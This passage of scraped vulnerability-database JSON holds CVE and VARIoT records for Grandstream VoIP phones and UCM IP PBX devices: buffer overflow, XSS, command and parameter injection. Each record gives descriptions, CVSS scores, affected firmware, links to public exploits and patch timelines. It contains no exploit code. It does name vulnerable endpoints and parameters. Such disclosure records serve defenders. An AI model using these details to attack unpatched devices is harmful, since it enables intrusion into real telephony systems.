"title": "Grandstream GXP1600 VoIP Phones - Unauthenticated stack buffer overflow",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "9974b330-7714-4307-a722-5648477acda7",
"assignerShortName": "rapid7",
"cveId": "CVE-2026-2329",
"datePublished": "2026-02-18T14:08:09.272Z",
"dateReserved": "2026-02-11T09:26:52.179Z",
"dateUpdated": "2026-02-18T14:50:51.252Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-14186 (GCVE-0-2025-14186)
Vulnerability from cvelistv5 – Published: 2025-12-07 07:32 – Updated: 2025-12-08 17:12
VLAI
Title
Grandstream GXP1625 Network Status api.values.post cross site scripting
Summary
A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://vuldb.com/?id.334606 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.334606 | signaturepermissions-required |
| https://vuldb.com/?submit.698650 | third-party-advisory |
| https://drive.google.com/file/d/1rsskCaj4TwiaGG9_… | exploit |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP1625 |
Affected:
1.0.7.4
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-14186",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-08T17:03:17.876643Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-08T17:12:50.148Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"modules": [
"Network Status Page"
],
"product": "GXP1625",
"vendor": "Grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.7.4"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "cccll (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 4,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "Basic Cross Site Scripting",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-74",
"description": "Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-07T07:32:06.898Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-334606 | Grandstream GXP1625 Network Status api.values.post cross site scripting",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.334606"
},
{
"name": "VDB-334606 | CTI Indicators (IOB, IOC, TTP, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.334606"
},
{
"name": "Submit #698650 | Grandstream GXP1625 1.0.7.4 xss",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.698650"
},
{
"tags": [
"exploit"
],
"url": "https://drive.google.com/file/d/1rsskCaj4TwiaGG9_VYabjnKMP_zAry7L/view?usp=sharing"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-12-06T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2025-12-06T01:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2025-12-06T15:06:24.000Z",
"value": "VulDB entry last update"
}
],
"title": "Grandstream GXP1625 Network Status api.values.post cross site scripting"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2025-14186",
"datePublished": "2025-12-07T07:32:06.898Z",
"dateReserved": "2025-12-06T14:01:21.254Z",
"dateUpdated": "2025-12-08T17:12:50.148Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-32937 (GCVE-0-2024-32937)
Vulnerability from cvelistv5 – Published: 2024-07-03 14:05 – Updated: 2025-11-04 17:20
VLAI
Summary
An os command injection vulnerability exists in the CWMP SelfDefinedTimeZone functionality of Grandstream GXP2135 1.0.9.129, 1.0.11.74 and 1.0.11.79. A specially crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.
Severity
8.1 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | GXP2135 |
Affected:
1.0.11.74
Affected: 1.0.11.79 Affected: 1.0.9.129 |
|
| grandstream | gxp2135_firmware |
Affected:
1.0.11.74
Affected: 1.0.11.79 Affected: 1.0.9.129 cpe:2.3:o:grandstream:gxp2135_firmware:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:grandstream:gxp2135_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "gxp2135_firmware",
"vendor": "grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.11.74"
},
{
"status": "affected",
"version": "1.0.11.79"
},
{
"status": "affected",
"version": "1.0.9.129"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-32937",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-03T14:16:57.228461Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-03T14:59:05.703Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:20:20.384Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978",
"tags": [
"x_transferred"
],
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
},
{
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "GXP2135",
"vendor": "Grandstream",
"versions": [
{
"status": "affected",
"version": "1.0.11.74"
},
{
"status": "affected",
"version": "1.0.11.79"
},
{
"status": "affected",
"version": "1.0.9.129"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Matthew Bernath of Cisco Talos."
}
],
"descriptions": [
{
"lang": "en",
"value": "An os command injection vulnerability exists in the CWMP SelfDefinedTimeZone functionality of Grandstream GXP2135 1.0.9.129, 1.0.11.74 and 1.0.11.79. A specially crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-03T17:00:11.294Z",
"orgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"shortName": "talos"
},
"references": [
{
"name": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1978"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "b86d76f8-0f8a-4a96-a78d-d8abfc7fc29b",
"assignerShortName": "talos",
"cveId": "CVE-2024-32937",
"datePublished": "2024-07-03T14:05:35.575Z",
"dateReserved": "2024-04-19T20:26:32.967Z",
"dateUpdated": "2025-11-04T17:20:20.384Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-0840 (GCVE-0-2024-0840)
Vulnerability from cvelistv5 – Published: 2024-04-29 18:42 – Updated: 2024-08-01 18:18
VLAI
Title
Grandstream UCM Series IP PBX HTTP Parameter Injection
Summary
The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.
Severity
8.8 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-141 - Improper Neutralization of Parameter/Argument Delimiters
Assigner
References
1 reference
Impacted products
5 products
| Vendor | Product | Version | |
|---|---|---|---|
| Grandstream | UCM Series |
Affected:
0 , < <1.0.20.52
(custom)
|
|
| grandstream | ucm6202_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6204_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6208_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:* |
|
| grandstream | ucm6510_firmware |
Affected:
0 , < 1.0.20.52
(custom)
cpe:2.3:a:grandstream:ucm6510_firmware:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6202_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6204_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6208_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:grandstream:ucm6510_firmware:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ucm6510_firmware",
"vendor": "grandstream",
"versions": [
{
"lessThan": "1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0840",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T19:17:53.854809Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T13:09:24.386Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:18:18.719Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://vulncheck.com/advisories/grand-stream-param-injection"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "UCM Series",
"vendor": "Grandstream",
"versions": [
{
"lessThan": "\u003c1.0.20.52",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jacob Baines (VulnCheck)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.\u003cbr\u003e"
}
],
"value": "The Grandstream UCM Series IP PBX before firmware version 1.0.20.52 is affected by a parameter injection vulnerability in the HTTP interface. A remote and authenticated attacker can execute arbitrary code by sending a crafted HTTP request. Authentication may be possible using a default user and password. Affected models are the UCM6202, UCM6204, UCM6208, and UCM6510.\n"
}
],
"impacts": [
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-141",
"description": "CWE-141 Improper Neutralization of Parameter/Argument Delimiters",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-29T18:42:57.112Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"url": "https://vulncheck.com/advisories/grand-stream-param-injection"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to firmware version 1.0.20.52 or later. Ensure the web interface is not exposed to the internet.\u003cbr\u003e"
}
],
"value": "Upgrade to firmware version 1.0.20.52 or later. Ensure the web interface is not exposed to the internet.\n"
}
],
"source": {
"discovery": "UNKNOWN"
},
"timeline": [
{
"lang": "en",
"time": "2024-01-25T17:00:00.000Z",
"value": "VulnCheck reports the vulnerability to Grandstream"
},
{
"lang": "en",
"time": "2024-01-26T02:00:00.000Z",
"value": "Grandstream acknowledges receipt"
},
{
"lang": "en",
"time": "2024-02-08T04:42:00.000Z",
"value": "Grandstream shares a patch build"
},
{
"lang": "en",
"time": "2024-04-26T04:11:00.000Z",
"value": "Grandstream releases 1.0.20.52"
}
],
"title": "Grandstream UCM Series IP PBX HTTP Parameter Injection",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2024-0840",
"datePublished": "2024-04-29T18:42:57.112Z",
"dateReserved": "2024-01-23T21:10:19.364Z",
"dateUpdated": "2024-08-01T18:18:18.719Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201903-1405
Vulnerability from variot - Updated: 2024-02-13 22:43Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI. Grandstream UCM6204 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream UCM6204 is an IP PBX (Private Branch eXchange) device from Grandstream.
There are security vulnerabilities in Grandstream UCM6204 versions prior to 1.0.19.20. An attacker could use this vulnerability to execute an illegal command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1405",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6204",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.19.20"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.19.20",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"cve": "CVE-2019-10662",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-10662",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-42874",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10662",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10662",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-42874",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1226",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-10662",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the backupUCMConfig file-backup parameter to the /cgi? URI. Grandstream UCM6204 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream UCM6204 is an IP PBX (Private Branch eXchange) device from Grandstream. \n\nThere are security vulnerabilities in Grandstream UCM6204 versions prior to 1.0.19.20. An attacker could use this vulnerability to execute an illegal command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10662",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-42874",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "165708",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-10662",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"id": "VAR-201903-1405",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
}
]
},
"last_update_date": "2024-02-13T22:43:58.192000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6204 command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192499"
},
{
"title": "Grandstream UCM6204 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90910"
},
{
"title": "Grandstream Exploits",
"trust": 0.1,
"url": "https://github.com/scarvell/grandstream_exploits "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 1.7,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10662"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10662"
},
{
"trust": 0.8,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920"
},
{
"trust": 0.6,
